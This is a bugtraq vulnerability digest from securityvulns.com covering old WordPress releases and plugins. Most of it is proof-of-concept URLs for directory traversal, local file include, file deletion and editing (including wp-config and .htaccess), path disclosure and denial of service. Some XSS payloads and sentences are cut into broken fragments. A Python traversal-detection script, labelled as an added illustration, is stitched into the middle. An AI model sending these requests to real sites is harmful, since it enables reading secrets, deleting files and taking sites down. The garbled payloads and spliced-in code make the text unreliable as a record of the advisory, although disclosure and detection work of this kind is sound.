
securityvulns.com Russian vulnerabilities digest: WordPress vulnerabilities

Dear bugtraq,

  Below is a digest of vulnerabilities published by

  English. All vulnerabilities were reported by MustLive

  1. AwesomeTemplateEngine cross-site scripting

  Multiple cross-site scripting (requires register_globals):

ocument.cookie)%3C/script%3E /

script%3Ealert(document.cookie)%3C/script%3E /

(document.cookie)%3C/script%3E /

cookie)%3C/script%3E

  2. Wordpress multiple security vulnerabilities:

   2.1 information disclosure (WordPress 2.2/2.3)

    An invalid request discloses the database structure and local paths:

   2.2 cross-site scripting (WordPress <= 2.0.9)

(alert(document.cookie))%22

   2.3 Directory traversal, Arbitrary file deletion, Denial of Service
   and Cross-Site Scripting via wp-db-backup.php

   Directory Traversal (WordPress <= 2.0.3):

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=/../../.htaccess

   Arbitrary file deletion and DoS (WordPress <= 2.0.3):

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../index.php
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=/../../index.php

   XSS (WordPress <= 2.0.11 and potentially 2.1.x, 2.2.x, 2.3.x):

  2.4 Local file include, Directory traversal and Full path disclosure
  (WordPress <= 2.0.11 and potentially 2.1.x, 2.2.x, 2.3.x)

  Full path disclosure:

http://site/wp-admin/admin.php?import=/../../wp-config
http://site/wp-admin/themes.php?page=
http://site/wp-admin/edit.php?page=
http://site/wp-admin/admin.php?page=
http://site/wp-admin/templates.php?file=
http://site/wp-admin/templates.php?page=
http://site/wp-admin/edit-pages.php?page=
http://site/wp-admin/categories.php?page=
http://site/wp-admin/edit-comments.php?page=
http://site/wp-admin/moderation.php?page=
http://site/wp-admin/post.php?page=
http://site/wp-admin/page-new.php?page=
http://site/wp-admin/index.php?page=
http://site/wp-admin/link-manager.php?page=
http://site/wp-admin/link-add.php?page=
http://site/wp-admin/link-categories.php?page=
http://site/wp-admin/link-import.php?page=
http://site/wp-admin/theme-editor.php?page=
http://site/wp-admin/plugins.php?page=
http://site/wp-admin/plugin-editor.php?page=
http://site/wp-admin/profile.php?page=
http://site/wp-admin/users.php?page=
http://site/wp-admin/options-general.php?page=
http://site/wp-admin/options-writing.php?page=
http://site/wp-admin/options-reading.php?page=
http://site/wp-admin/options-discussion.php?page=
http://site/wp-admin/options-permalink.php?page=
http://site/wp-admin/options-misc.php?page=
http://site/wp-admin/import.php?page=
http://site/wp-admin/admin-footer.php
http://site/wp-admin/admin-functions.php
http://site/wp-admin/edit-form.php
http://site/wp-admin/edit-form-advanced.php
http://site/wp-admin/edit-form-comment.php
http://site/wp-admin/edit-link-form.php
http://site/wp-admin/edit-page-form.php
http://site/wp-admin/menu.php
http://site/wp-admin/menu-header.php
http://site/wp-admin/import/blogger.php
http://site/wp-admin/import/dotclear.php
http://site/wp-admin/import/greymatter.php
http://site/wp-admin/import/livejournal.php
http://site/wp-admin/import/mt.php
http://site/wp-admin/import/rss.php
http://site/wp-admin/import/textpattern.php
http://site/wp-admin/bookmarklet.php?page=
http://site/wp-admin/cat-js.php?page=
http://site/wp-admin/inline-uploading.php?page=
http://site/wp-admin/options.php?page=
http://site/wp-admin/profile-update.php?page=
http://site/wp-admin/sidebar.php?page=
http://site/wp-admin/user-edit.php?page=

  Local file include and Directory traversal:

http://site/wp-admin/admin.php?import=/../../file
http://site/wp-admin/themes.php?page=/../../file.php
http://site/wp-admin/themes.php?page=/../../.htaccess
http://site/wp-admin/edit.php?page=/../../file.php
http://site/wp-admin/edit.php?page=/../../.htaccess
http://site/wp-admin/admin.php?page=/../../file.php
http://site/wp-admin/admin.php?page=/../../.htaccess
http://site/wp-admin/templates.php?page=/../../file.php
http://site/wp-admin/templates.php?page=/../../.htaccess
http://site/wp-admin/edit-pages.php?page=/../../.htaccess
http://site/wp-admin/categories.php?page=/../../.htaccess
http://site/wp-admin/edit-comments.php?page=/../../.htaccess
http://site/wp-admin/moderation.php?page=/../../.htaccess
http://site/wp-admin/post.php?page=/../../.htaccess
http://site/wp-admin/page-new.php?page=/../../.htaccess
http://site/wp-admin/index.php?page=/../../file.php
http://site/wp-admin/index.php?page=/../../.htaccess
http://site/wp-admin/link-manager.php?page=/../../.htaccess
http://site/wp-admin/link-add.php?page=/../../.htaccess
http://site/wp-admin/link-categories.php?page=/../../.htaccess
http://site/wp-admin/link-import.php?page=/../../.htaccess
http://site/wp-admin/theme-editor.php?page=/../../.htaccess
http://site/wp-admin/plugin-editor.php?page=/../../.htaccess
http://site/wp-admin/profile.php?page=/../../.htaccess
http://site/wp-admin/users.php?page=/../../.htaccess
http://site/wp-admin/options-general.php?page=/../../.htaccess
http://site/wp-admin/options-writing.php?page=/../../.htaccess
http://site/wp-admin/options-reading.php?page=/../../.htaccess
http://site/wp-admin/options-discussion.php?page=/../../.htaccess
http://site/wp-admin/options-permalink.php?page=/../../.htaccess
http://site/wp-admin/options-misc.php?page=/../../.htaccess
http://site/wp-admin/import.php?page=/../../.htaccess
http://site/wp-admin/bookmarklet.php?page=/../../.htaccess
http://site/wp-admin/cat-js.php?page=/../../.htaccess
http://site/wp-admin/inline-uploading.php?page=/../../.htaccess
http://site/wp-admin/options.php?page=/../../.htaccess
http://site/wp-admin/profile-update.php?page=/../../.htaccess
http://site/wp-admin/sidebar.php?page=/../../.htaccess
http://site/wp-admin/user-edit.php?page=/../../.htaccess

  Arbitrary file edit:

http://site/wp-admin/templates.php?file=/../../file

  Attacks with a backslash are possible in the Windows version.
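As an added illustration that is not part of the original digest, the following Python scans constructed Apache-style access-log lines for the pattern reported in 2.3 and 2.4 above: wp-admin requests whose `page`, `backup`, `import` or `file` parameter carries a `..` segment after percent-decoding, with backslashes folded to slashes to cover the Windows case just mentioned. The log lines, client addresses and the set of watched parameter names are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Parameters the digest reports as reachable with traversal sequences in the
# WordPress <= 2.0.x admin scripts (assumed list for this example).
WATCHED_PARAMS = {"page", "backup", "import", "file"}

# Constructed sample access-log lines (not taken from any real server).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Dec/2007:10:00:01 +0000] "GET /wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess HTTP/1.1" 200 512
192.0.2.11 - - [01/Dec/2007:10:00:02 +0000] "GET /wp-admin/admin.php?import=%2F..%2F..%2Fwp-config HTTP/1.1" 200 2048
192.0.2.12 - - [01/Dec/2007:10:00:03 +0000] "GET /wp-admin/themes.php?page=..%5C..%5C.htaccess HTTP/1.1" 200 300
192.0.2.13 - - [01/Dec/2007:10:00:04 +0000] "GET /wp-admin/edit.php?page=wp-db-backup.php HTTP/1.1" 200 4096
192.0.2.14 - - [01/Dec/2007:10:00:05 +0000] "GET /index.php?p=12 HTTP/1.1" 200 8192
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')
# A ".." path segment delimited by slashes (backslashes are folded first).
TRAVERSAL_RE = re.compile(r'(?:^|/)\.\.(?:/|$)')

def normalize(value: str) -> str:
    """Percent-decode until stable (catches double encoding), then fold
    Windows-style backslashes to forward slashes."""
    prev = None
    while prev != value:
        prev, value = value, unquote(value)
    return value.replace("\\", "/")

def find_traversal(line: str):
    """Return (script, param, decoded_value) when a wp-admin request carries
    a traversal sequence in a watched parameter, otherwise None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group(1))
    if not parts.path.startswith("/wp-admin/"):
        return None
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name not in WATCHED_PARAMS:
            continue
        for v in values:
            decoded = normalize(v)
            if TRAVERSAL_RE.search(decoded):
                return (parts.path.rsplit("/", 1)[-1], name, decoded)
    return None

def scan(log_text: str):
    """Return one finding per matching log line, in file order."""
    return [hit for hit in map(find_traversal, log_text.splitlines()) if hit]

if __name__ == "__main__":
    for script, param, value in scan(SAMPLE_LOG):
        print(f"traversal in {script} param {param!r}: {value}")
```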

  Original article (in Russian):

  Additional detail (in Ukrainian):

3. Cross-site scripting and Denial of Service in PRO-Search <= 0.17

XSS:

Denial of Service:

http://site/?show_page=20000&time=0

4. Persistent cross-site scripting and request forgery in WP-ContactForm
<= 1.5 alpha (WordPress plugin)

POST request to

http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php

with different form fields.

Exploits:

Original article (in Russian):

Additional details (in Ukrainian):

5. RotaBanner Local <= 3 cross-site scripting

6. ExpressionEngine <= 1.2.1 response splitting and cross-site scripting

%3C/script%3E

-=-=-=-

There are also a few vulnerabilities published in English as part of
the Month of Bugs in CAPTCHA:

Cryptographp <= 1.2 WordPress plugin: multiple persistent cross-site
scripting issues

XSS in Math Comment Spam Protection < 2.2

XSS in Captcha! <= 2.5d

--

http://securityvulns.com/
